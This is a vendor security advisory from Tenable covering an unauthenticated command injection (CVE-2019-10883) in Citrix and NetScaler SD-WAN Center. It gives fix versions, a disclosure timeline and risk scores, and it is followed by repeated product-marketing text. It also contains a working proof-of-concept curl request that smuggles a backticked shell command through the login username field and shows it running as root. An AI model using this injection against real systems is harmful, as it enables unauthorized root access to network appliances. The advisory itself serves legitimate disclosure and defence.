Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

Citrix SD-WAN Center and NetScaler SD-WAN Center Unauthenticated Remote Command Injection

Critical

Synopsis

While developing a Nessus plugin for CVE-2017-6316, Tenable found an unauthenticated remote operating system command injection vulnerability in Citrix SD-WAN Center 10.2.0.136.733315.

The vulnerability appears to be in /home/talariuser/www/app/Controller/UsersController.php. The controller has insufficient validation of user-supplied data ($username). An unauthenticated remote attacker can use the following CURL command to run arbitrary OS commands on the remote host:

curl -skv --tlsv1.2 -d '_method=POST&data%5BUser%5D%5Busername%5D=%60sudo%20id%20>/tmp/test%60&data%5BUser%5D%5Bpassword%5D=my_password&data%5BUser%5D%5BsecPassword%5D=my_secPassword' 'https://[target_host]/login'

With command output:

root@VWC:/home/talariuser/www/app/Controller# cat /tmp/test
uid=0(root) gid=0(root) groups=0(root)

Solution

Upgrade NetScaler SD-WAN Center to 10.0.7 or newer. Upgrade Citrix SD-WAN Center to 10.2.1 or newer. Follow Citrix's security best practices to further enhance your security posture.

Disclosure Timeline

01/28/19 - Vulnerability discovered.
02/07/19 - Tenable reported to [email protected] via encrypted email. 90 days is May 9th.
02/08/19 - Citrix acknowledges and asks for Tenable's public key.
02/08/19 - Tenable sends a public key.
02/26/19 - Citrix acknowledges they've reproduced the vulnerability.
02/26/19 - Tenable thanks Citrix.
04/03/19 - Tenable asks Citrix for an update.
04/04/19 - Citrix indicates they are getting a CVE assigned and a bulletin ready. Asks Tenable who to credit.
04/04/19 - Tenable says "Tenable, Inc." and offers to assign the CVE.
04/08/19 - Citrix indicates April 10th is the disclosure date and notes they already have a CVE allocated.
04/08/19 - Tenable asks for a copy of the draft bulletin or CVE assignment.
04/08/19 - Citrix assigned CVE-2019-10883. Can't share bulletin.
04/08/19 - Tenable thanks Citrix.
04/10/19 - Citrix notifies Tenable of publication and thanks Tenable.
04/10/19 - Tenable thanks Citrix.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

CVE ID: CVE-2019-10883
Tenable Advisory ID: TRA-2019-18
CVSSv2 Base / Temporal Score:
10.0 / 8.3
CVSSv2 Vector:
AV:N/AC:L/Au:N/C:C/I:C/A:C
Affected Products:
NetScaler SD-WAN Center 9.x
NetScaler SD-WAN Center 10.0.x before 10.0.07
Citrix SD-WAN Center 10.1.x
Citrix SD-WAN Center 10.2.x before 10.2.1
Risk Factor:
Critical

Advisory Timeline

04/10/2019 - Initial Release

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Try Tenable Web App Scanning

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable One Exposure Management platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. Sign up now.

Your Tenable Web App Scanning trial also includes Tenable Vulnerability Management and Tenable Lumin.

Buy Tenable Web App Scanning

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

5 FQDNs

$3,578

Buy Now

Try Tenable Lumin

Visualize and explore your exposure management, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Your Tenable Lumin trial also includes Tenable Vulnerability Management and Tenable Web App Scanning.

Buy Tenable Lumin

Contact a Sales Representative to see how Tenable Lumin can help you gain insight across your entire organization and manage cyber risk.

Try Tenable Nessus Professional Free

FREE FOR 7 DAYS

Tenable Nessus is the most comprehensive vulnerability scanner on the market today.

NEW - Tenable Nessus Expert
Now Available

Nessus Expert adds even more features, including external attack surface scanning, and the ability to add domains and scan cloud infrastructure. Click here to Try Nessus Expert.

Fill out the form below to continue with a Nessus Pro Trial.

Buy Tenable Nessus Professional

Tenable Nessus is the most comprehensive vulnerability scanner on the market today. Tenable Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

Select Your License

Buy a multi-year license and save.

Add Support and Training

Try Tenable Nessus Expert Free

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Already have Tenable Nessus Professional?
Upgrade to Nessus Expert free for 7 days.

Buy Tenable Nessus Expert

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Select Your License

Buy a multi-year license and save more.

Add Support and Training